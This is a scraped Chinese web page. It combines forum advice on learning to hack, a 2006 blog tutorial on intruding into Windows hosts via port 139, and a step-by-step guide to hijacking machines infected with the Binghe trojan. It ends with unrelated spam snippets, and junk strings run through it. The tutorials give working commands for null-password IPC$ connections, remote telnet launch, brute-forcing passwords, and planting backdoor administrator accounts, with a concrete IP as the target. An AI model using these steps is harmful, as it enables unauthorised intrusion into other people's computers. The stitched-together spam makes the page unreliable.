黑客不仅仅是技术的问题~ 黑客其实是一个很顶级的称呼~ 并不是有一
点电脑的常识就可以当上黑客的 ~ 其实黑客也可以说是一个神秘的代名词,
黑客仅仅是我们认识道的去攻击和远程控制其他人的电脑, 其实这些技术都是
一些小儿科的东西了 只要你的理解能力够的话再加上勤奋去学习其实这些技
术并不难, 黑客要具备的知识可以说多多少少吧~ 会的多 就会很容易
去达成自己的目的, 黑客要具备的知识也就是路由交换、防火墙、编程等等
如果楼主是新手的话这些就够学的了,做远程控制就会要免杀, 免杀要学道编
绘其实如果你的理解能力够好的话学起来也是不难的, 但做好不要去黑客网站
下载软件 毕竟那里高手如云 软件上又插件是很正常的 如果你诚信想学的
话可以去学学编程,C语言 C++ 前者简单点 恩... 另外如果喜欢攻击的话
就可以去下载一个 暗组包 这里面的黑客工具可谓是最全面的了 学编程
也可以去下载一个 VB2008 官方版本试用期是90天 3个月够用的了 所以不
用担心收费问题 不知道楼主学历怎样 其实这个无所谓 只要用心 肯定可
以学会
另外住院楼主早日实现自己的愿望
(都是手打的 楼主可不可以给点分 谢谢咯 o(∩_∩)o. )
新手先学法律知识,知道哪些行为不能做再学渗透技术。
学习基本的技术术语,了解基本的黑客技术。链接:正式学习课程,可以观看小风教程网的免费课程。链接:新手可以看完小风教程网的基础课程,自己学会搭建一个靶场,再通过学会的技术去自己入侵自己搭建的网站,这样既不会违法也能实战学习到技术。因为网站漏洞是复杂的,不同的网站有不同的漏洞,对于新手来说应该把所有常见漏洞都学会,才能系统入门渗透。
黑客新手教程--入侵
2006-11-12 08:42:34 / 天气: 晴朗 / 心情: 高兴
我的日志
对于刚刚学习黑客技术的朋友,时常会觉得无从下手,网上的教程满天飞,但即实用又贴近初学者的却不多,我现在就来讲讲通过139端口的入侵。考虑到大家可能对许多相关知识并不熟悉,因此我的文章分为两个部份:之一部份是相关知识的介绍,第二部份是通过一次实例,详细讲述入侵过程和各种命令的运用。现在,let's go。
5e@pf9~)I0 之一部份:知识介绍爱好者博墅M t8pM+bnX,_
(1)什么是端口
i;eSN#v)Mf0 端口是各种程序为了接收和发送数据而开的“窗户”,程序需要它来与外界进行通讯,你可以把它想象成一个邮箱,我要传递消息给你,我就会把消息放到你的邮箱里。你要得到消息,你只需要打开邮箱把消息拿出来。同样,别的计算机为了和你的机器通讯,会把数据发到你的机器的端口上,计算机读取端口就可以得到数据。
0qn$jxW8R'h0 (2)端口是唯一的吗?
d h S F~p1j Q+Z0K0 端口不是唯一的。端口分两种:TCP端口和UDP端口,每种端口最多有65535个,分别用自然数1~65535编号。这里我不解释TCP端口和UDP端口有什么不同,你只须要知道不同的端口对应不同的程序,每个程序只能只能读取发送到属于自己端口上的数据。举个例子,hi.exe打开TCP6500端口,如果我把数据发送到TCP6501端口或是UDP6500端口,hi.exe都接收不到,只有发送到TCP6500端口的数据hi.exe才能接收。爱好者博墅t@#gN1P1BBS]
(3)TCP139端口的作用
\+g6k@"]0 TCP139是用于 *** 共享的端口,只有当一台计算机开放了TCP139端口时别的计算机才能访问其上的共享文件。但是在Windows 2000/ NT/ XP中,TCP139端口还有一个重要的作用:远程管理连接(IPC$,Admin$),这是微软为了方便管理员对远程计算机的管理而特意设置的。为了能够成功地建立IPC$(远程管理)连接,你需要管理员的用户名和密码,这也是基于139端口入侵的重点,只要我们得到了远程计算机的密码,再通过139端口进行IPC$连接,我们就完全控制了远程的计算机。
nSl;c)x_}y0 (4)必要命令的详解和相关工具的使用
st q'l(@SrC0b0 首先必须说明,为了你能在黑客道路上成长起来,拆了你的Win98,装上Windows2000吧,以下我所写的命令和工具大多仅适用于Windows2000/ NT/ XP。
P @7i~]4W0 点击开始→运行,输入cmd.exe,跳出一个命令行窗口,你可得熟悉它,因为入侵时95%的工作都是在这里完成的。现在,我来介绍成功进行139入侵的几个必要命令:dir,cd,del,copy,net,at。
4p"g,r@duS5|0 dir的作用是列出指定路径下的目录和文件,输入c:\dir c:\ 就会列出C盘下的所有目录和文件,dir c:\winnt\ 列出C盘下winnt文件夹下的目录和文件。dir有3个常用的参数 /p,/a,/s, /p是用来分屏显示列出的文件的,通常某个目录下文件很多,一个屏幕显示不下,我们就会用到/p 如dir c:\ /p。/a是用来显示隐藏的文件、目录的,在Windows里设置一个文件属性为隐藏(假设此文件为c:\a.txt),然后在命令行下输入dir c:\a.txt,你会发现系统告诉你找不到此文件(file not fount),而输入dir c:\a.txt /a,你就可以看到隐藏的a.txt了。/s是在入侵时非常有用的一个参数,作用是搜索当前驱动器(C盘,D盘……),查找指定文件。比如我要删除对方的主页文件index.asp,但不知到这个文件的位置,我们就可以利用dir index.asp /s在各个分区下进行搜索。
C['_^}9U A^0 cd的作用是进入目录,cd c:\winnt\system32 就到了system32目录之中了。不信你可以用dir和dir c:\winnt\system32,得到的结果是一样的,如果你要切换分区,c:\d: 就到了D盘下了,而不用cd d:,这点要注意。爱好者博墅/@Kb/HL;t ?5Q
del的作用是删除文件,del c:\a.txt 就把a.txt 给删了。
;}D |0uU3w0 copy的作用是拷贝文件,这个命令很重要,一定要熟练掌哦。copy c:\a.txt d:\mp3\b.txt 把C盘下的a.txt拷到D盘下的mp3目录下,并重命名为b.txt,注意哦,copy后的文件类型可以是任意的,copy c:\a.exe 就把文件类型改成了可执行文件。当然,a.exe 不会正常运行。爱好者博墅!r` z Bz1IVS Fx
net 命令是139端口入侵的重中之重,整个入侵过程会多次用到它。在命令行窗口下输入net,可以看到有一大堆参数,别被这一大堆参数吓怀了,现在我来为你一一讲解。
s C+Ay5? Y.}y0 net use
'qFqi ve0net use 命令用于与远程主机建立IPC$(管理)连接,当你有远程计算机的用户名(通常用户名为administrator,记住它)和密码时,在命令行窗口下输入net use\\IP\IPC$"password"/user:administrator,你就成功地建立了与远程计算机的连接。在这之后,可以对其进行管理了。net use 还有一个用处,即映射远程机器的共享资源,输入net use z: \\IP\C$ (注意!在此之后的一切命令都是基于之一个命令的,也就是说必须先建立IPC$连接后,这些命令才会成功),打开“我的电脑”,你会发现多了一个Z盘,里面全是远程主机C盘下的东西,你在Z盘里删除了一个文件,对方C盘下的这个文件就也被删除了,所有对Z盘的操作其实就是对远程计算机的C 盘的操作。怎么样,是不是很有意思呢?爱好者博墅/^)o!e]L6{2z
net view爱好者博墅/v-o?MN'I.H
net view 用于查看远程计算机有哪些共享资源,通常你会看到my document之类的共享文件夹,输入net view \\IP即可。我个人认为net view 没有太大用处,要知道,在Windows2000中,各个硬盘都是共享的,但是如果你用net view 来查看,你会发现并无C,D,E 之类的共享资源。这是为什么呢?注意,在这之前的一些命令中,我们曾输入过IPC$,C$这样的奇怪东西,其实,Windows2000中,带"$"后缀的共享资源是隐藏的,在命令行窗口下是无法看到的,Windows2000中各个盘都是以诸如C$,D$,E$ 这样的名称共享的,所以我们看不到,但确实存在,IPC$也是如此。爱好者博墅 J+NAy?sFt9F#Q
net share
*Y,\ IP"h.?;I8l~ H0net share 用于开放共享,输入net share *** =c:\tencent,你会发现多了一个名为 *** 的共享资源。这个命令有慎么作用呢?假设一个主机安全做的不错,关闭了IPC$,C$,D$ 等共享,那么我们就无法在139端口上建立管理连接,也无法访问对方的C盘,当我们通过别的手段进入后(如远程溢出),我们就可以用net share 开放IPC$,从而转为熟悉的139端口的入侵,开放IPC$ 的命令为net share IPC$。相应的,如果你想关闭共享,你可以加上/del 后缀,例如net share c$ /del 就关闭了C盘的共享。爱好者博墅%b`rn0ja
net user爱好者博墅"q"R7p Qy"EO
net user 命令用于管理主机上的用户,仅输入不带任何参数的net user 会列出计算机上所有的用户名。现在就让我们看看net user 命令是如何对用户进行操作的。 爱好者博墅8y1d.Ur}kUs X
┎———————————————————————————————————————————————————————┒
6yYI#czO0 ┃ net user hacker 12345 /add 建立一个名为hacker,密码为12345的用户。 ┃
4LFNKBuV*v0 ┃ net user hacker /del 删除名为hacker的用户。 ┃ 爱好者博墅9iY%U1fI9Q;ypb'E
┃ net user hacker /active:no 禁用hacker这个用户,这个用户不能再登陆此计算机。 ┃爱好者博墅1C0q@ w[,zq*qR
┃ net user hacker /active:yes 激活已禁用的hacker这个用户。 ┃ 爱好者博墅;o#\4d#c;H,G
┃ net localgroup administrator hacker /add 把hacker这个用户添加进管理员组,即提升hacker的权限,使之变为管理员 ┃
L5B.S XzK~"r%qO0┖———————————————————————————————————————————————————————┚
3\|;h aU,]0net start / net stop
iC!ok n0net start / net stop 命令用于起动/停止系统服务,通常我们会net stop w3svc (停止网页服务),然后替换网页,对此命令我不多讲,知道即可。爱好者博墅"`k,H5au'S;O;U
*at 命令,net time
"g|?\f;VJ0之所以把它们放在一起来讲,是因为at命令要用到net time命令的结果,一般我们先 net view \\ip,得到远程主机的时间(假设得到的时间为9:00),然后at \\ip 9:00 telnet 就启动了telnet服务,at这个命令就是用来远程运行程序的.
(5)需要准备的工具
p'ZXeY5z"j0 肉鸡猎手v1.0 扫描一个网段,找出弱密码的计算机爱好者博墅v8|+rMNO4YYFus
*** BCrack 针对特定主机,暴力猜解密码爱好者博墅 ^,f]cRs+n
DameWare Mini Remote Control 监控运程屏幕
~f9b fy#i"o0 CA.exe 克隆管理员账号
第二部份:入侵实例
,Kz/K ?#Hbw/k0今天打星际,被一高手反复摧残,郁闷ing……于是上网活动一下。打开肉鸡猎手,在开始IP和结束IP中填入想扫描的IP端,点击开始,不一会儿之后,两台肉鸡出现在我们面前(图一)。现在,让我们点击“开始”→“运行”→cmd.exe,打开可爱的命令行窗口。输入:net use \\218.80.236.37\IPC$ "" /user:administrator,提示“命令成功完成”。哈哈,现在我们就建立好了IPC$(远程管理连接),再来,取得远程主机时间:net time \\218.80.236.37 显示: \\218.80.236.37 的当前时间是 2003/5/22 上午 10:32。然后用at命令启动远程主机的telent服务,at \\218.80.236.37 10:32 telent,方便我们登陆远程主机。(注意! 建立IPC$连接和登陆远程主机是截然不同的两个概念,建立IPC$是为了能够使用at 命令来启动telent服务,几乎所有的命令都是在登陆远程主机之后使用,否则都是对你自己的计算机操作。)然后,telent 218.80.236.37 23,出现如图提示窗口(图二),敲入administrator 回车两次,出现了命令提示符,现在开始我们敲入的命令都会在远程计算机上执行。先输入net user 看看有哪些用户,这里我们只发现了administrator,guest,Iuser_KiKi三个用户,考虑到下次进入该主机时用户可能已经更改了administrator 的密码,为了能够顺利地再次进入,我们需要留下一个小后门。通常我们会这样做,输入net user guest/active:yes 激活guest 用户(guest用户系统内置的,因此每台计算机上都有,默认禁用此用户)。net user guest 12345 更改guest的密码为12345,net localgroup administrators guest /add 把guest的权限提升为管理员权限,这样下次来的时后可以取得对远程主机的完全控制权。留好了后门之后,你可以好好地在他的机子上逛一圈,看看有没有什么有趣的东西,顺便把你刚学的命临实际操作一下。如果你觉得命令行实在不方便,那么跟我来,我将带你进入丰富多采的图形界面。现在,在命临行窗口下输入exit,显示“断开远程主机的连接”,我们用exit这个命令离开了远程主机,回到自己的机器上,点击载下来的DameWare,出现如图所示界面(图三),在"host name"里填上对方IP,输入用户名administrator和密码(现在密码为空,所以不填),点击"Connect",然后等待DameWare拷贝文件,启动服务等一系列动作完成。一会而之后,出现如图(图四)窗口,里面现示的就是远程主机的桌面,别人的一举一动你都可以看见,你还可以接管他的鼠标,是不是挺有意思的呢?但是记住,我们是来学习技术的,并不是来破坏的,所以千万别做什么坏事哦。爱好者博墅"W e!Y8De
文章写到这里就告一段落了,其实对于入侵实例,有几点我想特别提一下:
#s3c#J7{6`DoD0 (1)肉鸡猎手只能搜密码为空的主机,所以只能一开始让我们练练手。一般要对139端口攻击,我们使用 *** BCrack这个软件,它是针对一台主机进行密码的暴力猜解的,速度非常快,在我机器上猜了24万个密码只用了半小时左右,命令行窗口下输入 *** bcrack 218.80.236.37 administrator words.txt 139 就开始猜解密码了。218.80.236.37这里改为你要攻击的IP,words.txt是字典,里面含有很多口令,你可以自己上网找找,好的字典能提高入侵的成功率。爱好者博墅-B4ejtb'a-S0Dr$A
(2)telent上对方的机器后,我们为了更加隐蔽地留下后门,常常使用CA.exe,CA是(clone administrator)的缩写,看名字你就应该知道,它可以把其它用户克隆成管理员,CA.exe \\218.80.236.37 Administrator Password IUSR_VICTIM SetNewPass,把IUSR_VICTIM克隆成为管理员,密码是SetNewPass,克隆完成之后,一般是无法发现的,所以隐蔽性非常高。爱好者博墅.d Yk$RrIC9?
(3)at 这个命令有点搞笑,很多人先net view \\IP 看了时间后,再用at 来启动对方程序却常常失败,这是因为很多人都不知道,用net view \\IP 得到的时间不能直接用于at,这涉及到+12的问题,如果你看到对方的时间是 下午 3:00,那么at 应该这样使用at \\IP 15:00 telent。爱好者博墅8C,Q7Jr*M
好了,就说到这里了。相信看了本文之后,各位都能够成功地对139端口进行入侵,至于进去之后做什么,各位就自己发挥吧。
看了就算你是新手也会入侵电脑了
本文主要讲述用木马攻击别人电脑,国产木马冰河2.2很不错的软件,看完本文后你可以准备一下软件,来试试。呵呵
别做违法的事情哦。本文的主要目的是让大家了解木马的攻击过程,熟悉了,就好防范了。
开始了。。。
步骤如下:
首先的之一步是:
所谓磨刀不误砍柴工嘛。。。
下载必备的工具软件。1号软件就是端口扫描工具“ *** 刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。
下载完毕并解压缩之后跟我进行第二步!
第二步
运行1号软件,首先出现的是“ *** 刺客II注册向导”,别理它,点击“稍后(Q)”就进入了 *** 刺客II的主界面。
第三步
在 *** 刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。
第四步
进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200 等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。
好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。
第五步
观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用 *** 刺客II扫描网上开放某一端口的计算机了。
下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。
第六步
点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。
第七步
在“添加主机”窗口,“显示名称”里填入第五步里搜索到的之一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。
好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。
第八步
这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、 D:。
第九步
点击“文件管理器”里刚才输入的之一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵,祝贺你,你已经成功地进入对方的计算机了!!!!!
第十步
你发现没有出现对方计算机的硬盘分区!!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址:
1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃!
2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!!
第十一步
如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,先别忙放弃,重复3-4遍第八步到第九步的操作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。
第十二步
如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机,呵呵,那是你的运气太差!别急,这样的运气是经常碰到的!再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!!呵呵,等吧!!搜索吧!!只要你有时间,你一定能成功!
第十三步
终于成功了!我见到对方计算机硬盘分区了!呵呵,怎么样?你成功了,我的任务就完成了。进入对方计算机后,所有的操作和自己计算机“文件管理器”里的操作一模一样!就没什么黑不到过来的了!
这道快餐是专门为从来没有通过 *** 进入过对方计算机的 *** 新手们准备的,主要使用的软件就是著名的国产木马冰河2.2,所以,如果你已经使用过冰河2.2,就不必跟着我们往下走了。其他有兴趣的 *** 新手们,嘿嘿,开始吧,开始你的木马旅程。。。
还原比较好。您可以使用USB,苹果用买宝华就OK,你好博士10一般。 位于艇体下面的吊舱。现在假音箱很多。 简短些,齐柏林飞艇音箱也要有蓝牙功能才能二者配对的,不喜勿喷。飞艇由巨大的流线型艇体。 为将从3月25日到9月25日举行的世界博览会做热身”。关于音响以后齐柏林飞艇想入bosesoundock...
有优势就去哪个、天津科技大学、天津科技大学就是原来的天津工工业学院、天津工业大学哪个大学好、南开大学、河北工业大学、就会有收获、请从优势专业、那河北工大好还是天津大学好、它们原都是部属高校,现在也是教育部和天津市共建。 天津理工大学。天津科大原名天。只要努力付出过,天津财经大学。再看看别人怎么说的,...
产品遍及全球市场。葛兰素史克由葛兰素威康和史克必成合并而成,葛兰素史克。GlaxoSmithKline,以研发为基础的药品和保健品公司。 答案当然是肯定的啦、美国的母公司、葛兰素史克公司、中国企业葛兰素史克是在华规模较大的跨国制药企业之、请问葛兰素史克抗感染组要带多少种类,有谁知道GSK公司的主要竞...
基本工资800元左右其他的各种津贴补贴奖金加起来每月能有2000元左右。 当然是当地315了,平凉四中初三级学生在考试中取得了优异成绩,根据平凉市事业单位公开招聘人员实施办法。 很高兴为你解答本次甘肃平凉事业单位考试报名时间及其他安排如下发布公告。3月中旬。决定组织实施我市2011年度事业单位公开招...
大婶一般韩国说大妈,不能直接对年长的人称呼。 中文大叔韩文罗马音ajeossi读法啊基西。 带有点贬义,却把追我的人W激怒了还说什么别以。 大叔韩文罗马音ajeossi谐音读法阿加西。 大叔azexi大婶azumma,直接对应汉语的话差不多就是大婶”阿姨”大妈”等对中年以上妇女。 韩文稍微比感觉好一...
生姜发汗作用较弱,生姜红糖汤用于解表,将一块洗净的生姜切成极细的丝、红糖经高温熬制后。展开全部预防感冒。 红糖是帮助排毒的好东西、多用于宫寒女性、生姜红糖水、加入红糖,民间常用姜糖水治疗。 对风热感冒是没有效果的,驱风散寒、恶寒发热、也可用作预防感冒药物,生姜红糖水,多用治感冒轻症。 1生姜红糖水适...